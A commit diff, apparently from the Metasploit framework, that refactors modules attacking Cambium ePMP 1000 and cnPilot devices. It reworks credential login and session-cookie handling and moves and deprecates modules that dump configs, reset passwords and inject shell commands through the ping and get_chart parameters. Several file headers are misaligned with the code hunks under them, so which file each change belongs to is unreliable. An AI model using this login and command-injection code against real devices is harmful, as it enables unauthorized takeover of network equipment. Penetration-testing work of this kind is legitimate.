Use of get_cookies_parsed, changing dirs, marking deprecated in 2 mods, more

Author: juushya

lib/msf/core/exploit/http/cnpilot.rb renamed to lib/msf/core/auxiliary/cnpilot.rb

@@ -102,23 +102,25 @@ def login_2(user, pass, epmp_ver)
       }
     )
 
+    cookies = res.get_cookies_parsed
+    check_sysauth = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+
     good_response = (
       res &&
       res.code == 200 &&
-      res.headers.include?('Set-Cookie') &&
-      res.headers['Set-Cookie'].include?('sysauth')
+      check_sysauth.include?('sysauth')
     )
 
     if good_response
-      sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
-      cookie1 = "#{sysauth_value}"
+      sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+      sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
       prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/)
 
       res = send_request_cgi(
         {
           'uri' => '/cgi-bin/luci',
           'method' => 'POST',
-          'cookie' => cookie1,
+          'cookie' => sysauth_value,
           'headers' => {
             'X-Requested-With' => 'XMLHttpRequest',
             'Accept' => 'application/json, text/javascript, */*; q=0.01',
@@ -136,7 +138,6 @@ def login_2(user, pass, epmp_ver)
       good_response = (
         res &&
         res.code == 200 &&
-        res.headers.include?('Set-Cookie') &&
         !res.body.include?('auth_failed') &&
         !res.body.include?('Maximum number of users reached.')
       )
@@ -152,20 +153,23 @@ def login_2(user, pass, epmp_ver)
         )
 
         # get the cookie now
-        sysauth_value_2 = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
-        stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/)
-        stok_value_2 = "#{stok_value_2_dirty}".split('"')[3]
-        final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}"
+        cookies = res.get_cookies_parsed
+        stok_value_dirty = res.body.match(/"stok": "(.*?)"/)
+        stok_value = "#{stok_value_dirty}".split('"')[3]
+        sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+        sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
+
+        final_cookie = "#{sysauth_value}" + 'usernameType_80=admin; stok_80=' + "#{stok_value}"
 
         # create config_uri for different modules
-        config_uri_dump_config = '/cgi-bin/luci/;stok=' + "#{stok_value_2}" + '/admin/config_export?opts=json'
-        config_uri_reset_pass = '/cgi-bin/luci/;stok=' + "#{stok_value_2}" + '/admin/set_param'
-        config_uri_get_chart = '/cgi-bin/luci/;stok=' + "#{stok_value_2}" + '/admin/get_chart'
+        config_uri_dump_config = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/config_export?opts=json'
+        config_uri_reset_pass = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/set_param'
+        config_uri_get_chart = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/get_chart'
 
         return final_cookie, config_uri_dump_config, config_uri_reset_pass, config_uri_get_chart
       else
         print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
-        vprint_status('Either the credentials are incorrect or Maximum number of logged-in users reached.')
+        print_status('Either the credentials are incorrect or Maximum number of logged-in users reached.')
         final_cookie = 'skip'
         config_uri_dump_config = 'skip'
         config_uri_reset_pass = 'skip'
@@ -193,17 +197,20 @@ def login_1(user, pass, epmp_ver)
       }
     )
 
+    cookies = res.get_cookies_parsed
+    check_sysauth = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+
     good_response = (
       res &&
       res.code == 200 &&
-      res.headers.include?('Set-Cookie') &&
-      res.headers['Set-Cookie'].include?('sysauth')
+      check_sysauth.include?('sysauth')
     )
 
     if good_response
-      sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
+      sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+      sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
 
-      cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
+      cookie1 = "#{sysauth_value}" + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
 
       res = send_request_cgi(
         {
@@ -223,11 +230,12 @@ def login_1(user, pass, epmp_ver)
         }
       )
 
+      cookies = res.get_cookies_parsed
+
       good_response = (
         res &&
         res.code == 200 &&
-        res.headers.include?('Set-Cookie') &&
-        res.headers['Set-Cookie'].include?('stok=') &&
+        cookies.has_key?('stok') &&
         !res.body.include?('Maximum number of users reached.')
       )
 
@@ -241,11 +249,13 @@ def login_1(user, pass, epmp_ver)
           password: pass
         )
 
-        # get the cookie now
-        get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/)
-        stok_value = get_stok[1]
-        sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
-        final_cookie = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
+        # get the final cookie now
+        cookies = res.get_cookies_parsed
+        stok_value = cookies.has_key?('stok') && cookies['stok'].first
+        sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+        sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
+
+        final_cookie = "#{sysauth_value}" + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D; userType=Installer; usernameType=installer; stok=" + "#{stok_value}"
 
         # create config_uri for different modules
         config_uri_dump_config = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/config_export?opts=json'
@@ -256,7 +266,7 @@ def login_1(user, pass, epmp_ver)
         return final_cookie, config_uri_dump_config, config_uri_reset_pass, config_uri_get_chart, config_uri_ping
       else
         print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
-        vprint_status('Either the credentials are incorrect or Maximum number of logged-in users reached.')
+        print_status('Either the credentials are incorrect or Maximum number of logged-in users reached.')
         final_cookie = 'skip'
         config_uri_dump_config = 'skip'
         config_uri_reset_pass = 'skip'

lib/msf/core/exploit/http/epmp.rb renamed to lib/msf/core/auxiliary/epmp.rb

@@ -31,3 +31,9 @@
 require 'msf/core/auxiliary/redis'
 require 'msf/core/auxiliary/sms'
 require 'msf/core/auxiliary/mms'
+
+#
+# Custom HTTP modules
+#
+require 'msf/core/exploit/http/cnpilot'
+require 'msf/core/exploit/http/epmp'

lib/msf/core/auxiliary/mixins.rb

@@ -114,8 +114,6 @@
 require 'msf/core/exploit/http/joomla'
 require 'msf/core/exploit/http/typo3'
 require 'msf/core/exploit/http/jboss'
-require 'msf/core/exploit/http/cnpilot'
-require 'msf/core/exploit/http/epmp'
 
 # Kerberos Support
 require 'msf/core/exploit/kerberos/client'

lib/msf/core/exploit/mixins.rb

@@ -8,6 +8,9 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::AuthBrute
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2017, 12, 29), 'auxiliary/scanner/admin/http/epmp1000_ping_cmd_exec')
 
   def initialize(info={})
     super(update_info(info,

modules/auxiliary/scanner/http/epmp1000_cmd_exec.rb

@@ -81,9 +81,9 @@ def cmd_exec(config_uri, cookie)
 
     if good_response
       path = store_loot('ePMP_cmd_exec', 'text/plain', rhost, res.body, 'Cambium ePMP 1000 Command Exec Results')
-      print_status("#{rhost}:#{rport} - File saved in: #{path}")
+      print_status("#{rhost}:#{rport} - Results saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to execute command.")
+      print_error("#{rhost}:#{rport} - Failed to execute command(s).")
     end
   end
 

modules/auxiliary/admin/http/epmp1000_get_chart_cmd_exec.rb renamed to modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb

@@ -68,7 +68,7 @@ def cmd_exec(config_uri, cookie)
         },
         'vars_post' =>
           {
-            'ping_ip' => '8.8.8.8', # This parameter can also be used for injection
+            'ping_ip' => '127.0.0.1', # This parameter can also be used for injection
             'packets_num' => clean_inject,
             'buf_size' => 0,
             'ttl' => 1,
@@ -84,9 +84,9 @@ def cmd_exec(config_uri, cookie)
 
     if good_response
       path = store_loot('ePMP_cmd_exec', 'text/plain', rhost, res.body, 'Cambium ePMP 1000 Command Exec Results')
-      print_status("#{rhost}:#{rport} - File saved in: #{path}")
+      print_status("#{rhost}:#{rport} - Results saved in: #{path}")
     else
-      print_error("#{rhost}:#{rport} - Failed to execute command.")
+      print_error("#{rhost}:#{rport} - Failed to execute command(s).")
     end
   end
 

modules/auxiliary/admin/http/epmp1000_ping_cmd_exec.rb renamed to modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb

@@ -78,7 +78,8 @@ def reset_pass(config_uri, cookie)
       res &&
       res.code == 200 &&
       res.headers.include?('Content-Type') &&
-      res.headers['Content-Type'].include?('application/json')
+      res.headers['Content-Type'].include?('application/json')&&
+      res.body.include?('config_id')
     )
 
     if good_response

modules/auxiliary/admin/http/epmp1000_reset_pass.rb renamed to modules/auxiliary/scanner/http/epmp1000_reset_pass.rb

@@ -7,6 +7,9 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::SNMPClient
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
+  include Msf::Module::Deprecated
+
+  deprecated(Date.new(2017, 12, 29), 'auxiliary/scanner/snmp/epmp1000_snmp_loot')
 
   def initialize
     super(

modules/auxiliary/scanner/snmp/cambium_snmp_loot.rb

@@ -128,22 +128,24 @@ def login(user, pass)
     )
 
     cookies = res.get_cookies_parsed
+    check_sysauth = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+
     good_response = (
       res &&
       res.code == 200 &&
-      cookies.include?('sysauth')
+      check_sysauth.include?('sysauth')
     )
 
     if good_response
-      sysauth_value = cookies.match(/((.*)[$ ])/)
-      cookie1 = "#{sysauth_value}"
+      sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+      sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
       prevsessid = res.body.match(/((?:[a-z][a-z]*[0-9]+[a-z0-9]*))/)
 
       res = send_request_cgi(
         {
           'uri' => '/cgi-bin/luci',
           'method' => 'POST',
-          'cookie' => cookie1,
+          'cookie' => sysauth_value,
           'headers' => {
             'X-Requested-With' => 'XMLHttpRequest',
             'Accept' => 'application/json, text/javascript, */*; q=0.01',
@@ -158,11 +160,9 @@ def login(user, pass)
         }
       )
 
-      cookies = res.get_cookies_parsed
       good_response = (
         res &&
         res.code == 200 &&
-        !cookies.blank? &&
         !res.body.include?('auth_failed') &&
         !res.body.include?('Maximum number of users reached.')
       )
@@ -171,17 +171,20 @@ def login(user, pass)
         print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
 
         # get the cookie now
-        sysauth_value_2 = cookies.match(/((.*)[$ ])/)
-        stok_value_2_dirty = res.body.match(/"stok": "(.*?)"/)
-        stok_value_2 = "#{stok_value_2_dirty}".split('"')[3]
-        final_cookie = "#{sysauth_value_2}" + 'usernameType_80=admin; stok_80=' + "#{stok_value_2}"
+        cookies = res.get_cookies_parsed
+        stok_value_dirty = res.body.match(/"stok": "(.*?)"/)
+        stok_value = "#{stok_value_dirty}".split('"')[3]
+        sysauth_dirty = cookies.values.select { |v| v.to_s =~ /sysauth_/ }.first.to_s
+        sysauth_value = sysauth_dirty.match(/((.*)[$ ])/)
+
+        final_cookie = "#{sysauth_value}" + 'usernameType_80=admin; stok_80=' + "#{stok_value}"
 
         # create config_uri
-        config_uri_get_chart = '/cgi-bin/luci/;stok=' + "#{stok_value_2}" + '/admin/get_chart'
+        config_uri_get_chart = '/cgi-bin/luci/;stok=' + "#{stok_value}" + '/admin/get_chart'
         return final_cookie, config_uri_get_chart
       else
         print_error("FAILED LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
-        vprint_status('Either the credentials are incorrect or Maximum number of logged-in users reached.')
+        print_status('Either the credentials are incorrect or Maximum number of logged-in users reached.')
         final_cookie = 'skip'
         config_uri_get_chart = 'skip'
         return final_cookie, config_uri_get_chart